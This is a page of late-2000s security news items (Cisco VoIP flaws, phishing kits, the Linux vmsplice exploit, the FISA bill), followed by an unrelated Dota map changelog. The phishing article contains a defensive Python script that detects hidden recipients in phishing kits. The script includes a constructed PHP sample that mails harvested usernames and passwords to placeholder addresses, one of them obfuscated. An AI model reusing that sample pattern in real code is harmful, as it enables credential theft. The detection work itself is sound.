VoIP malware loophole plugged by Cisco

Cisco rushed out a brace of security advisories on Thursday to defend against potentially dangerous exploits via its VoIP kit, including the possibility of malicious code being injected into vulnerable networks.

The twin advisories from the network giant cover a range of vulnerabilities in Cisco IP Phones and its Unified Communications Manager (UCM) call management software.

A range of Cisco 7900 Series IP Phones are subject to multiple flaws, some of which may lend themselves to attacks involving the execution of arbitrary code on a vulnerable phone. Malicious DNS responses, a bug on the phone's SSH server and flaws in the handling of MIME on SIP messages all create buffer overflow risks. Other bugs create a means to crash vulnerable phones.

The bugs affect ranges of Cisco Unified IP Phone devices running both SIP firmware and SCCP firmware, as explained here. Cisco's advisory - which contains patching instructions - can be found here.

Exploitation would be tricky, but updates are still recommended to guard against possible attack. Workarounds involving disabling potentially vulnerable services are possible but troublesome because they would stop remote management of devices, the SANS Institute Internet Storm Centre notes.

Sys admins also need to update their software to either version 5.1(3a) or 6.1(1a), as appropriate, following the discovery of a SQL injection flaw. Left unpatched, the vulnerability creates a means for an authenticated user to get their hands on sensitive database information, such as user names, password hashes and call records. Logged-in users may also be able to alter or delete call records. Cisco's advisory can be found here.


Rise in attacks on Macs 'inevitable'

Over 90 per cent of computer users believe that cyber-criminals will step up their attacks on Apple Macs in the future, according to a new poll.

However, half of respondents to the Sophos survey said that the problem will be as great as that faced by Windows users.

"Although we have seen the first attempts by criminal gangs to make money through Mac OS X malware, there are still only a tiny number of viruses and Trojans for Apple Macs compared to Windows," said Graham Cluley, senior technology consultant at Sophos.

"It seems unlikely that the Mac virus problem will ever be as big as the Windows one. Yes, the Macintosh malware threat is a concern, but it is important to put it into perspective."

Commentators have pointed out that the threats are less about the inherent security of any given operating system and more down to economies of scale.

As the popularity of Macs increases, and Apple improves its market share, it becomes increasingly viable for professional hackers to target Mac users.

Cluley added that this represents the perfect opportunity for Mac users to learn from the mistakes of PC users.

"By resisting the urge to click on unsolicited web links or to download unknown code from the web, they can help to send a clear message to the cyber-criminals that it is just not financially rewarding to target Macs," he said.

A similar survey two years ago revealed that only 79 per cent of computer users believed that Macs would become more commonly targeted by hackers, indicating that users are now less optimistic about the likelihood of their computers being attacked in the future.


Mozilla accused by Opera of irresponsible disclosure

In a blog posted yesterday on Opera’s website, blogger Claudio Santambrogio tells us that he isn’t happy about the way Mozilla handled an Opera security disclosure. Here’s what Claudio had to say:

Mozilla notified us of one security issue the day before they published their public advisory. They did not wait for us to come back with an ETA for a fix: they kept their bug reports containing the details of the exploits closed to the public for a few days, and now opened most of them to everybody (awww).

Opera is as always committed to not only protecting its users, but to making the Web a safe place. We believe in responsible disclosure of vulnerabilities affecting several vendors.

Now I followed that published link and it says nothing about an Opera vulnerability unless it’s something that affects both Opera and Mozilla software. It’s still too early to tell since details about the vulnerability are sparse. Developing …


scam bank scammers

Many of the people behind identity theft scams are themselves having data stolen from them in the process, a security researcher has revealed.

Phishers, who trick online banking users into typing in their details to fake sites, use tools in the process which have built-in security holes for others to access the data that many do not have the technical skills to spot, according to a security researcher.

Nitesh Dhanjani will next week tell the Black Hat security conference in Washington of the results of his and his colleague Billy Rios's immersion in the world of phishers. He told OUT-LAW Radio of his findings this week.

Dhanjani claims that most phishers are far from the technical sophisticates of the popular imagination. Most, he said, use pre-written phishing kits that take little skill to operate.

"What you see in [the kits] is ready made phishing sites," he said. "All the research we've done is just basically what you can do from a web browser without even crossing the line where it's called hacking."

Dhanjani said it was extremely easy to come across details that had been stolen just hours previously. "Within 15 minutes of starting this research we were staring at people's bank accounts and credit card numbers and ATM PIN numbers posted on international message boards," he said.

But the authors of the phishing kits are using more junior phishers to do the work for them. Dhanjani said when he and Rios, who both work for unnamed major corporations, looked at the computer code in the kits, they found that it had two different instructions commanding the system to email a victim's details.

"We realised that in the second mail command there was a hard coded email address that the victim's information was also going to," said Dhanjani. "So unbeknown to the phisher deploying this kit, his information from the victim is going to him in addition to the author who wrote this kit, so there you have a phisher phishing a phisher."
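The double-mail trick described above is easy to miss when a kit is recovered from a compromised web host, because the second recipient is usually a literal buried away from the configuration block, sometimes base64-encoded. The following triage script is an added illustration, not code from Dhanjani and Rios's research: it walks the `mail()` calls in a PHP kit file, resolves each recipient expression through plain string assignments and `base64_decode("...")` literals, and reports every address other than the one the deployer configured. The kit text and all addresses are constructed; a real kit will need the regexes extended to whatever obfuscation it uses.

```python
"""Triage helper: list every address to which a PHP phishing kit mails
captured form data, so a responder can spot recipients the kit's deployer
never configured.  Added illustration; all kit text and addresses are
constructed for this example."""
import base64
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# First argument of PHP mail(): the recipient expression up to the first comma.
MAIL_CALL_RE = re.compile(r"\bmail\s*\(\s*([^,]+?)\s*,")
# Simple `$name = <expr>;` statements, enough for config-style kit files.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*([^;]+);")
# A common obfuscation in kits: base64_decode("...") applied to a literal.
B64_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def collect_assignments(src):
    """Map variable names to e-mail addresses assigned as string literals,
    decoding base64_decode("...") literals along the way."""
    values = {}
    for m in ASSIGN_RE.finditer(src):
        name, rhs = m.group(1), m.group(2).strip()
        b64 = B64_RE.fullmatch(rhs)
        if b64:
            try:
                rhs = base64.b64decode(b64.group(1), validate=True).decode("ascii", "replace")
            except ValueError:
                continue  # not valid base64; leave unresolved
        elif rhs[:1] not in ("'", '"'):
            continue  # expression, not a plain literal; leave unresolved
        found = EMAIL_RE.search(rhs)
        if found:
            values[name] = found.group(0)
    return values


def resolve_recipient(expr, values):
    """Resolve a mail() first argument to an address, or None if we cannot."""
    expr = expr.strip()
    if expr[:1] in ("'", '"'):
        found = EMAIL_RE.search(expr)
        return found.group(0) if found else None
    if expr.startswith("$"):
        return values.get(expr[1:])
    return None


def find_recipients(src):
    """One entry per mail() call, in source order; unresolved ones keep the raw expression."""
    values = collect_assignments(src)
    out = []
    for m in MAIL_CALL_RE.finditer(src):
        out.append(resolve_recipient(m.group(1), values) or "<unresolved: %s>" % m.group(1).strip())
    return out


def hidden_recipients(src):
    """Every recipient other than the first mail() call's.  Assumption for this
    example: the first call is the one the deploying phisher configured, so any
    other address is a silent copy to the kit's author."""
    recipients = find_recipients(src)
    return sorted(set(recipients[1:]) - {recipients[0]}) if recipients else []


# Constructed sample kit file: one configured recipient plus two copies the
# deployer never sees, one of them base64-obfuscated.
HIDDEN_B64 = base64.b64encode(b"kit-author@example.invalid").decode()
SAMPLE_KIT = (
    '<?php\n'
    '$recipient = "operator@example.invalid";  // edited by the deployer\n'
    '$msg = "user=" . $_POST["user"] . " pass=" . $_POST["pass"];\n'
    'mail($recipient, "Login", $msg);\n'
    '$x = base64_decode("' + HIDDEN_B64 + '");\n'
    'mail($x, "Login", $msg);\n'
    'mail("kitauthor@example.invalid", "Login", $msg);\n'
    'header("Location: https://bank.example.invalid/");\n'
)

if __name__ == "__main__":
    for addr in hidden_recipients(SAMPLE_KIT):
        print("hidden recipient:", addr)
```

Run against the constructed kit, the script reports both `kit-author@example.invalid` and `kitauthor@example.invalid` as recipients the deployer did not set, which is exactly the "phisher phishing a phisher" pattern; unresolved expressions are kept in the output so that anything the resolver cannot follow is reviewed by hand rather than silently dropped.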

Gartner estimated that phishing scams cost $3.2bn in 2007, and there are significant costs over and above the money lost because it is often very difficult and time consuming for people to prove that they were not responsible for spending in their name.

Dhanjani said that there is no easy fix to the problem. He said that until banks and governments have more sophisticated systems than just simple credit card or government identity numbers the problem will continue.

He said, though, that the cost of changing those systems was greater than the sums currently being lost, meaning the systems are unlikely to change soon.


NHS laptop discharged with patient data

A laptop containing personal information on 5,123 patients has gone missing from an NHS hospital in Dudley.

The theft occurred on 8 January in the outpatient department at Russells Hall Hospital.

The latest data protection blunder was uncovered only when the Dudley Group of Hospitals wrote to those affected to warn them of the theft.

The hospital claims that the laptop was adequately protected and requires multiple passwords to access the data.

The NHS trust said that the laptop needs a log-in and password to switch on, and that the database containing the patient details requires a separate password.

"Clearly this is a serious issue," said Russells Hall Hospital spokesman Paul Farenden.

"We take precautions to try to protect all the IT equipment in our hospitals from theft, but given that this is a public building with thousands of people accessing it every day, there are inevitably practical difficulties around security."

Farenden said that the trust is in the process of rolling out encryption technology, following a £135,000 spend on data security. However, the laptop in question had not been upgraded before it was stolen.

Chris Mayers, chief security architect at Citrix, said that the HMRC data loss in November 2007, and the prospect of such incidents being made a criminal offence, should have been enough to create an atmosphere of increased security, but that this had clearly not happened.


Major Linux security glitch lets hackers in at Claranet

A major security vulnerability in the Linux kernel, which was revealed on Sunday, has claimed its first confirmed UK victim in business ISP Claranet.

Hackers used a bug in the sys_vmsplice kernel call, which handles virtual memory management, to gain root privileges and replace Claranet customers' index.html files with the hacker's calling card.

The exploit was noticed at about 6pm on Tuesday.

Claranet said: "Malicious activity related to the vulnerability was detected on Claranet's shared hosting platform. Within 10 minutes Claranet contained and halted the malicious activity, and locked down the platform to prevent further damage.

"The shared hosting platform was fully patched with the vendor's updates by 10am on Wednesday. Less than one per cent of the total web sites hosted on the Claranet platform were affected and all were restored to their original states by 1pm on Wednesday 13 February."

The (potentially tricky) hacking process was dumbed down by the publication of exploit code earlier this week, Linux-Watch notes.

Security notification firm Secunia reports that switching to either version 2.6.23.16 or 2.6.24.2 of the Linux kernel guards against attack. Hotfixes designed to plug the vulnerability short of upgrading the kernel have also been released.

The affected system call first appeared in version 2.6.17 of the Linux kernel, but wasn't left open to exploit until changes were made with the 2.6.23 version.

Linux vendors are working on a permanent fix for the problem. Claranet emphasised that it keeps a close eye on announcements of new vulnerabilities and acts swiftly to patch them.


Mobile industry sees new security risks

Security systems can now block the first computer virus attacks on cell phones, but the mobile industry sees new risks stemming from upcoming open software platforms such as Google's Android.

Since 2004, viruses have been able to disable phones or swell phone bills through pricey messages or unwanted calls, leading to a new security technology market.

"If Android becomes a fully open platform ... and when such a platform becomes more common, risks are greater than with the current platform kings such as Symbian," said Mikko Hypponen, head of research at security software firm F-Secure.

Security specialists also pointed to potential risks arising from Apple's plans to open its software platform to third-party developers this month.

"Apple has dealt very elegantly in the past with security issues. There will be issues. Apple will fix them," said Jan Volzke, global marketing head at McAfee's mobile unit.

Roughly 65 percent of all smartphones sold in the fourth quarter used software from British supplier Symbian, according to research firm Canalys.

Apple was the fourth-largest vendor with 7 percent of the market, following Microsoft and Research In Motion.

F-Secure and McAfee have been the leading security software vendors for mobiles, but many other antivirus firms rolled out products for the mobile industry over the last few years.

While the risk of a cell phone getting infected is still relatively small, thousands of phones have seen problems.

"Although the first problems were already quite extensive and appeared all over the world, current smartphones from the largest device makers, particularly Nokia, have got rid of these problems," said F-Secure's Hypponen.

Almost three out of four users were concerned about the safety of using new mobile services, showed a survey of 2,000 cell phone users, commissioned by McAfee, and unveiled this week at the Mobile World Congress in Barcelona.

"Concerns about specific mobile security risks or ... reliability of services is a crucial issue for operators, particularly in mature markets," Victor Kouznetsov, senior vice president at McAfee's mobile unit, said in a statement.

Mobile service providers are increasingly betting on new data services when looking for growth in mature markets where call prices are falling.

"Consumer fears are growing in tandem with increased mobile functionality," Kouznetsov said, adding this puts at risk the potential revenue from new services.

One in seven global mobile users have already been exposed to mobile viruses directly or know someone whose phone has been infected, McAfee's study showed.

Since the first mobile virus appeared in 2004 the number of different viruses, worms, and other types of malicious software has reached 395, F-Secure said, adding that the number of malicious programs has increased only slightly in the last 12 months.


Security firm outlines main web threats

Increased use of the internet has produced a number of commonplace threats, according to one security vendor.

Mark Brooks, marketing director at Global Security One, pointed to a recent Panorama programme that highlighted the potential online dangers to children, 12 per cent of whom had met with a stranger they found online.

"The explosion in social networking has meant a rise in online threats, as cyber-criminals create attacks targeting users to gather personal information," he said. "In online banking, fraud is a very real threat for many internet users."

Card-not-present fraud has reached more than £212m per annum, but Brooks believes that this is "just the tip of the iceberg when it comes to overall online financial losses".

Global Security One's latest product is designed to combat common issues posed by the internet.

"With the increase in criminal activity on the web, our aim is to make the internet safer, without limiting or restricting use," said Brooks.

Global Security One's XGate device is designed to remove the need for a separate router and security software by combining both aspects.


HP spying case settled

HP HAS SETTLED its court case with the newspapers and hacks who it spied on during an investigation into Board Room leaks.

No one is saying how much HP paid the New York Times and three BusinessWeek journalists who were spied on.

It looks like few of them will be buying boats or cars on the back of the settlement as most of the money seems to be going to charity.

The Times hack John Markoff, and BusinessWeek reporters Peter Burrows, Ben Elgin and Roger Crockett sued in September 2006 after the technology company revealed it secretly examined the private telephone logs of journalists, board members and HP employees to identify the source of leaks to the media.

Chairwoman Patricia Dunn and four private dicks faced criminal charges as a result of the case although those charges were later dropped. One investigator, Bryan Wagner, was charged in federal court and pleaded guilty to identity theft and conspiracy.

There are still a few other cases pending against HP. Another group of journalists whose phone records were also compromised in HP's probe are still suing HP for 'illegal and reprehensible conduct'. Mentioned in that suit are HP, Dunn and Kevin Hunsaker, the company's former ethics chief.

These include three hacks from CNET, Dawn Kawamoto, Stephen Shankland and Tom Krazit, and a former reporter from The Associated Press, Rachel Konrad.

HP has paid $14.5 million to make California's Attorney General go away as a result of the spying row.


Swedish hacker may be charged with Cisco code theft

The case of a 19-year-old Swedish hacker could have international ramifications after the Swedish Supreme Court affirmed the conviction in the country's court of appeals. The Swedish prosecutor may take over the FBI's probe of the alleged hacking of Cisco, which has been going on for several years.

In parallel with the prosecution of the hacker from Uppsala, the FBI has been collecting evidence and fingered the hacker as the perpetrator of a hack against Cisco. This crime is said to have taken place at approximately the same time as the crimes he was found guilty of, including hacks against several of Sweden's most prestigious universities and the National Supercomputer Centre in Linköping.

The decision of the Supreme Court of Sweden not to overturn the conviction means that nothing now prevents Sweden from granting the US request of a complete investigation and, later, bringing a court case against the teenager for the Cisco hack. "That possibility is now open," says Chatrine Rudström, chamber prosecutor in Uppsala.

The US request was initiated by local prosecutors and the FBI. There have been high-level contacts between the US and Swedish departments of justice. All letters concerning this matter are classified, but there are strong indications that a request was submitted to Sweden in mid-December 2006.

The conviction does not necessarily imply that the Cisco hack will result in a court case. However, the two cases have much in common, and the Supreme Court's opinion is bound to influence Rudström's decision.

"There is evidence on the man's computer that can be linked to the Cisco hack. Also, he has the same view of both cases," she said.

The US has already been granted some of its demands. After filing a request for legal aid, Swedish investigators have questioned the man about the Cisco intrusions.

The Cisco hack was discovered in 2005, as it emerged that the secret source code for networking equipment had been copied by somebody who gained access to Cisco's servers. After the crackdown in Sweden, the hacks ceased, according to an FBI statement released at the time.

The Uppsala hacker admits to having made the tools used in the hacks, but denies having committed any of them. "He insists that the court of appeals made the wrong decision," says Thomas Olsson, the lawyer of the Uppsala hacker. "Considering the weak argumentation, it might be possible that a different court might find differently."


U.K. student records to sit in accessible database

British students aged 14 to 19 will have their school records permanently placed on an electronic database accessible to prospective employers.

The project, called Managing Information Across Partners (MIAP), will launch in September. The record will include personal details and exam results and will remain with the pupil for life.

More than 40 partners, including the Learning and Skills Council, the Department of Innovation, Universities and Skills, and the Department for Work and Pensions, are involved in the project.

The system will be based on a Unique Learner Number.

"The Unique Learner Number, necessary to acquire a learner record for the diploma, is a unique identifier that can be used by a learner for life," MIAP said on its Web site. "It is a national number that is validated and is therefore deemed to be unique."

The aim is to expand the system to include other information and to allow details already available but scattered across many databases to be brought together, it said.

The pupil would have control over the record and would be able to restrict the information shared.

It is envisaged that the information could be transferred if the pupil changes school, goes to college or applies for work, MIAP said.

"This will save a lot of effort for the learner in having to present this information to a prospective employer or a college," it added.

Pupils currently have a Unique Pupil Number which is allocated by a school and used internally for administration purposes. It expires when the pupil leaves.

"At the moment both numbers will work alongside each other but it is quite likely that in the future the ULN would replace the UPN," MIAP said.

Margaret Morrissey, spokeswoman for the National Confederation of Parent Teacher Associations, said: "From the point of view of parents and children hold on--hold on to what is probably a good idea, but which raises concern about data protection."

The ability of official bodies to keep personal data secure has been questioned by a spate of recent scandals.

In December, nine NHS trusts lost 168,000 patient records. A month before, the details of 25 million child benefit claimants went missing. And information on 3 million learner drivers disappeared during that time.

Government plans for national identity cards have also been criticized for their expense and so-called Big Brother infringement.


Senate passes wiretap bill, grants immunity

The U.S. Senate passed a bill on Tuesday that would amend the Foreign Intelligence Surveillance Act (FISA), the laws governing wiretaps of suspected foreign agents and terrorists, granting retroactive immunity for telecommunications companies that had previously cooperated with the government.

Known as the FISA Amendments Act of 2007, or S.B. 2248, the bill passed by a vote of 68 to 29 with three senators, including Democratic presidential candidates Hillary Rodham Clinton (D-NY) and Barack Obama (D-IL), failing to vote. Senators had delayed the bill for a month in December 2007, and then extended stop-gap legislation by 15 days to give the legislators more time to debate the measure.

The White House commended the Senate on passing a bill that fell in line with its requested surveillance capabilities, and President Bush told the U.S. House of Representatives that he will not condone any more delays on the legislation.

"Congress has had over six months to discuss and deliberate. The time for debate is over," President Bush said in a statement on Wednesday. "If Republicans and Democrats in the Senate can come together on a good piece of legislation, there is no reason why Republicans and Democrats in the House cannot pass the Senate bill immediately."

The debate over the legality of the U.S. government's surveillance activities, which the Bush Administration refers to as the "Terrorist Surveillance Program," started in December 2005 after the New York Times published an article revealing the program. More than three dozen lawsuits have been filed against the telecommunications companies that cooperated with the U.S. government and the National Security Agency (NSA) -- the federal agency responsible for intelligence and surveillance. Ever since a stop-gap measure giving the Bush Administration significant surveillance powers passed in August, Congress has debated the form of future wiretapping for foreign intelligence.

Civil liberty groups blasted the Senate's actions.

"Immunity for telecom giants that secretly assisted in the NSA's warrantless surveillance undermines the rule of law and the privacy of every American," EFF Senior Staff Attorney Kevin Bankston said in a statement. "Congress should let the courts do their job instead of helping the administration and the phone companies avoid accountability for a half decade of illegal domestic spying."

Leaders in the House and Senate now must reconcile the bills in conference.


FBI issues prosthetic pregnant belly bomb alert

The FBI and Department of Homeland Security are warning US law enforcement agencies to keep a sharp look-out for "a new type of terrorism" in which apparently-pregnant women suddenly go bang due to the fact they aren't really mums-to-be at all, but cold-hearted suicide bombers packing explosives inside a swelling prosthetic belly.

We kid you not. In case you were wondering how this devilish device works, CBS explains that it "opens up from the front and the explosives are placed inside". There's a chilling news report demonstrating the hi-tech mechanism here.

CBS station WCBS-TV in New York City duly dragged out security expert Robert Strang for his take on a bang in the oven. He said: "It's not the first time we've had women involved before in one way or another. They're recruiting anybody they can get to do those things that's not going to inform law enforcement, that's not going to be a threat to these organisations that can get the job done."

The they in question is, of course, al-Qaeda, and the powers that be are reportedly a tad concerned that it's "actively recruiting people who look like Americans and sound like Americans to carry out the next attack on America".

While the authorities admit they actually have "no specific, credible intelligence" which indicates terrorists are "planning to use women and suicide bombers to attack", they say they issued the explosive prosthetic pregnant belly alert "in the wake of recent attacks overseas".


Hackers turn to drive-by downloads

Organised criminal hackers are waging a highly sophisticated war by exploiting vulnerabilities in end users' web browsers using drive-by downloads, security experts warn.

The extent of the threat was exposed in a recent Google Online Security Blog post and the 2007 Trend Statistics Report from IBM's X-Force.

"It has been 18 months since we started to identify web pages that infect vulnerable hosts via drive-by downloads, i.e. pages that attempt to exploit visitors by installing and running malware automatically," the Google blog stated yesterday.

"During that time we have investigated billions of URLs and found more than three million unique URLs on over 180,000 sites automatically installing malware."

Google's team also reported that around two per cent of malicious websites are delivering malware via advertising.

IBM reported recently that criminals are directly attacking web browsers in order to steal identities, gain access to online accounts and conduct other illicit activities.

Yuval Ben-Itzhak, chief technology officer at security firm Finjan, said: "Our research teams have already identified more and more criminal hackers using these techniques with great success."


Busy Patch Tuesday Piles Work on Sysadmins

Microsoft released 11 security updates to patch 17 vulnerabilities on Tuesday, by far its largest release in a year.

There were five critical and six important updates, the two highest levels issued by the software company. The patches cover a wide range of Microsoft products from Word, Publisher and the Office suite down to Microsoft Works, its Web server applications and Vista's implementation on the desktop.

The updates come less than a month after vendors such as Skype, Adobe Systems (Nasdaq: ADBE) and Apple (Nasdaq: AAPL) issued a series of patches. The sheer number of patches released within the past two weeks has placed IT departments in the unenviable position of trying to catch up with potentially malicious crackers.

"After several slow Patch Tuesdays, administrators are faced with the most patches they've seen in a year," Paul Zimski, senior director of market strategy with Scottsdale, Ariz.-based Lumension Security, told TechNewsWorld. "Because so many critical patches affect so many applications, these are widespread enough to have a bigger effect than we've seen in a year and they are going to require the utmost attention and energy."

The Web Server Problem

While the Office suite patches are likely the most important for day-to-day operations, the most time-consuming patches involve the Internet Information Services (IIS), which are Internet-based applications for Windows servers, Andrew Storms, director of security for San Francisco-based nCircle, told TechNewsWorld.

Many companies write code for their Web sites, which means any patch that is deployed will need to be tested to make sure that the systems work properly with the home-grown code. If the two systems don't work together, companies could lose their Web sites until the patch can be fixed. Companies could roll back the fix, but that would leave their Web site vulnerable to attacks, said Storms.

"It's going to take some time to test and deploy the IIS patches," said Storms. "That means the hackers have a longer time to seek out exploits in the system."

Patch Tuesdays

At the end of the day, though, Storms said the updates -- while taxing for IT departments -- are a normal part of Microsoft's operation.

The company releases security updates on the second Tuesday of each month. The number of fixes varies, depending upon the testing and research process. Last February, the company released 12 patches. Last month, it released two.

Microsoft has hired a series of private companies -- and its own security experts -- to look for flaws, which it then uses to develop patches. Once the systems have been tested, they are released to the general public.

"Microsoft has hired its own security folks -- along with other private vendors," said Storms. "This is likely the culmination of its release cycle. It's not necessarily out of the norm. Microsoft likely believed that these high-risk patches needed to be released now."


Download Dota 6.50b AI



6.50b AI Changelog
==============

Hero Changes:
-------------
* Removed manacost on Mana Shield activation
* Changed Leap's cooldown to scale with levels
* Improved Juggernaut's movement speed
* Implemented a better silencing mechanism in the Black Hole area to prevent spell execution regardless of cast animation time
* Lowered Drow Ranger's Agility gain per level
* Changed Drow Ranger's Marksmanship ultimate
* Increased Morphling's base damage
* Macropyre's cooldown no longer increases per level
* Added an extra bounce to Chain Frost
* Reduced Sprint's damage amplification
* Increased Maledict's area of effect by 15
* Changed Spectre's Dispersion
* Redesigned Visage
* Improved casting range on Acid Spray
* Changed how Song of the Siren levels up
* Reduced cooldown on high level Shapeshift
* Improved armor on Enigma's Eidolons
* Reduced Expulsion's cooldown and manacost
* Improved Keeper of the Light's attack animation
* Improved Scattershot's damage range from 10-35 to 20-35
* Improved Alchemist's base Intelligence and growth
* Slightly improved Psi Blades' spill width and range
* Improved Chemical Rage
* Increased Phantom Lancer's Strength gain
* Increased cooldown on Psionic Trap from 7 to 14 seconds
* Improved lifesteal on level 2 and 3 Insatiable Hunger
* Reduced Replicate's manacost and cooldown
* Improved Troll's base movement speed
* Decreased Rampage's movement speed bonus and cooldown
* Improved Spirit Bear's Demolish
* Increased Lightning Storm's cooldown by 2 seconds
* Reduced cooldown on level 4 Metamorphosis from 135 to 110 seconds
* Reduced Lina's movement speed by 5
* Improved Sand Storm
* Reduced the slow on Epicenter
* Improved range on Drow Ranger's Trueshot Aura
* Improved cooldown progression on Insatiable Hunger
* Reduced Sven's base armor
* Improved Enigma's movement speed
* Modified initial projectile speed and effect on Paralyzing Casks
* Improved Enfeeble
* Improved Auto Fire's area of effect and duration
* Reduced Queen of Pain's Blink range at early levels
* Improved Earthshaker's movement speed
* Zombies now give a bit less bounty
* Reduced Gravechill's cooldown a bit
* Increased Primal Roar's cooldown a little bit
* Eclipse's damage is based on Lucent Beam level and doesn't ministun
* Lucent Beam ministun duration increases per level (0.6 level 4 up from a constant 0.01)
* Lowered Eclipse's manacost and gave it constant cooldown progression
* Increased Lucent Beam's casting range and lowered manacost slightly
* Improved cast range on Expulsion and Fire Storm
* Improved Ravage a little (it became slightly less effective with the Impale recodes)
* Reverse Polarity's cooldown is now the same on all levels
* Changed Queen of Pain's blink cooldown from 12/9/7/5 to 12/10/8/6 seconds
* Removed true sight from Spin Web
* Added some extra movement bonus on higher level Spin Web
* Improved Keeper of the Light's movement speed
* Improved Storm Spirit's base armor
* Lowered Mirror Image's cooldown slightly
* Improved slow on Drunken Haze
* Improved movement bonus on Witchcraft
* Lowered Searing Arrows' cooldown
* Improved Reaper's Scythe's leveling a bit
* Changed Purification's damage type to Pure
* Lowered Axe's starting Agility and increased his starting Strength
* Lowered Death Coil's cooldown
* Improved Undying's base armor
* Improved Meepo's base Strength
* Rebalanced Pit of Malice
* Increased AOE on Firestorm
* Reduced the search area for Omnislash
* Changed Bloodrage's stats a bit
* Lowered level 1 Mana Void's manacost
* Lowered Exorcism's damage return threshold and cooldown
* Restored Bone Fletcher's old Wind Walk speed bonus
* Lowered Geminate's attack cooldown
* Slightly improved how Medusa's Purge levels

Item Changes:
-------------
* Redesigned Eul's Scepter of Divinity
* Redesigned Orchid Malevolence
* Redesigned Guinsoo's Scythe of Vyse
* Added cooldown to Bottle usage and reduced its sell cost
* Bottle is in full state at all the side shops once again
* Changed how Dagger of Escape works. It cannot be activated if you took damage in the last 3 seconds.
* Added Hyperstone to the Goblin Shop
* Changed Unholy Rage's lifesteal type to be the same as regular lifesteal
* Reduced price on Ultimate Orb
* Added Ring of Health to the Goblin Shop
* Added Quarterstaff to the Goblin Shops
* Increased Perseverance's damage from 7 to 10
* Added Javelin to the Goblin Shops
* Removed the stack restriction on Shiva's Guard
* Improved Vanguard a little
* Changed Lothar's Edge's recipe and stats
* Reduced Vladmir's Offering recipe cost
* Reduced Linken's Sphere's cooldown
* Removed stacking restriction from Bloodstone and improved its stats
* Improved Helm of the Dominator damage from 10 to 20
* Improved Oblivion Staff mana regen by 25%
* Quarterstaff price reduced
* Hand of Midas can now target level 6 Neutrals (Satyr Hellcaller and Dark Troll Warlord)
* Reduced Void Stone's cost by 25 gold
* Improved casting range per level of Dagon upgrade
* Improved Sange and Yasha
* Removed Flying Courier Mana and gave it a Mana base upgrade ability
* Wards now require 5 mana to be placed
* Reduced animation time and cooldown on Manta Style
* Ring of Health's regeneration increased by 1

Neutral Related:
----------------
* Changed some of the Scourge's top left forest area
* Changed the locations and distribution of neutral creep camp groups
* Fixed neutral spawn times in various modes
* Reworked the trees and pathing near the small Sentinel creep camp
* Increased neutral creep Centaur's aura by 5%
* Added an Alpha Wolf with a command aura in the wolves' creep camp
* Added a new creep camp group (1 Ghost with Frost Attack + 2 Fel Beasts)
* Added a new ancient creep camp group (Jungle Stalkers)
* Added a new creep camp group (1 Enraged Wildkin with Tornado + 2 Wildkins)
* Added a new creep camp group (1 Dark Troll Warlord with Raise Dead and 1.5 sec Ensnare + 2 Dark Trolls)
* Changed the Furbolg's Stomp to a Clap
* Improved Satyr Hellcaller's Unholy Aura
* Neutral Ogre no longer autocasts Frost Armor
* Changed the location of some of the Scourge creep camps
* Redid neutral creep spawner code for some optimizations

Bug Fixes:
-----------
* Recoded impale based effects completely, fixing various ramp bugs, stacking issues and a lot of rare problems. (Burrowstrike, Impale (Lion), Impale (Nerubian Assassin), Ravage)
* Fixed Land Mines to properly detect floating heroes
* Fixed a problem with Huskar's Burning Spears that would cause him to swing incorrectly when the enemy is moving
* Fixed some bugs with Wild Axes
* Fixed some color issues on the load screen (kunkka)
* Couriers can no longer use Scroll of Town Portal to make buildings invulnerable
* Fixed Dark Rift from initiating cooldown when cast incorrectly
* Fixed a bug introduced in the recent Aghanim's Scepter changes on Crystal Maiden
* Fixed Last Word triggering off of Linken's Sphere's usage
* Fixed Berserker Rage triggering Essence Aura
* Insatiable Hunger, God's Strength and Rampage are no longer removed by Cyclone
* Fixed Javelin's odds being slightly off
* Fixed an issue with the Cheese drop from Roshan
* Fixed an issue with Forest Troll High Priest's pathing scale
* Fixed some text display problems when viewing replays (thanks DonTomaso)
* Fixed a very minor bug with Elder Form's duration
* Fixed Armlet of Mordiggian's recipe cooldown
* Fixed typo on Psi Blades
* Fixed some creep death time discrepancies (188461)
* Fixed a very minor bug with the damage mechanism on Shukuchi
* Fixed a display bug with Mode Random
* Fixed a possible abuse with Helm of the Dominator
* Fixed Overload from using its charge when attacking an allied unit
* Fixed Last Word from turning off Electric Rave

Others:
-------
* Remade Invoker as promised in 6.49
* Added a new game mode -singledraft or -sd (swiss)
* Improved Sentinel creep pathing on top Sentinel lane
* Adjusted starting gold between all game modes like ap/xl/rd/sd to be the same (all the same as xl) and for randoms to be like ar. Gold is now given at the start and income starts with the first creep wave.
* Income is now distributed in 1 gold intervals instead of in 8 gold intervals (same total gold)
* Added a new experimental command -ah
* Added a new system to detect replays used in -ah and other future applications (thanks PandaMine)
* Changed how the secondary shops work. You can now see their location and click them while in fog.
* Added new visual effect for Orchid Malevolence's Soul Burn (JetFango)
* -roll now shows the range the person entered (188889)
* Added a new command -clear to clear game messages from your screen
* Reduced model size and changed the look of the non-ancient Golems
* Added a new command -apm to show your actions per minute
* Couriers can now disassemble items (161180)
* Added text descriptions for power ups (68307)
* Delayed the creep spawn time by 30 seconds in -vr
* Made "Helm of Iron Will" item name consistent between recipes and core, using Helm instead of Helmet.
* Centered swap request notice is given to a player (182779)
* Added -afk that displays how long each player has been idle for
* Added a conditionally available -kickafk command to boot players that have been idle for more than 10 minutes (171984)
* Necronomicon icon now changes per level (190183)
* Changed durations of some power ups (Haste 45->30, Illusion 60->75, Regen 45->30)
* Moon Wells now gather water during night and get drained during day. This has no gameplay impact (60920)
* Added new tooltip text on items showing if they can be disassembled
* Improved tooltip for observer wards to detail the stock mechanics
* Added a new command -courier that toggles idle courier icon on and off (Ro-Coco)
* Added a new command -swapall to request to swap for any hero (175040)
* Improved Shackles caster effect
* Added an additional constant (7) Mana regeneration to Fountains
* Removed replenish interval from buying Clarity Potion (like tangos now)
* Changed Heartstopper pure damage type to HP loss (not a nerf or a buff, just works with things like dagger in a more desirable way)
* Improved Electric Rave icon (169997)
* Improved Luna's orb warning message (113338)

A lot of work has been done on developing a system for seamlessly translating DotA to other languages. Thanks to Danat for his help and support on it and to the new translators that have signed up. Once the initial language translation is complete, I will make a post to recruit people that wish to translate into other languages.

Thanks to the following beta testers for their help:
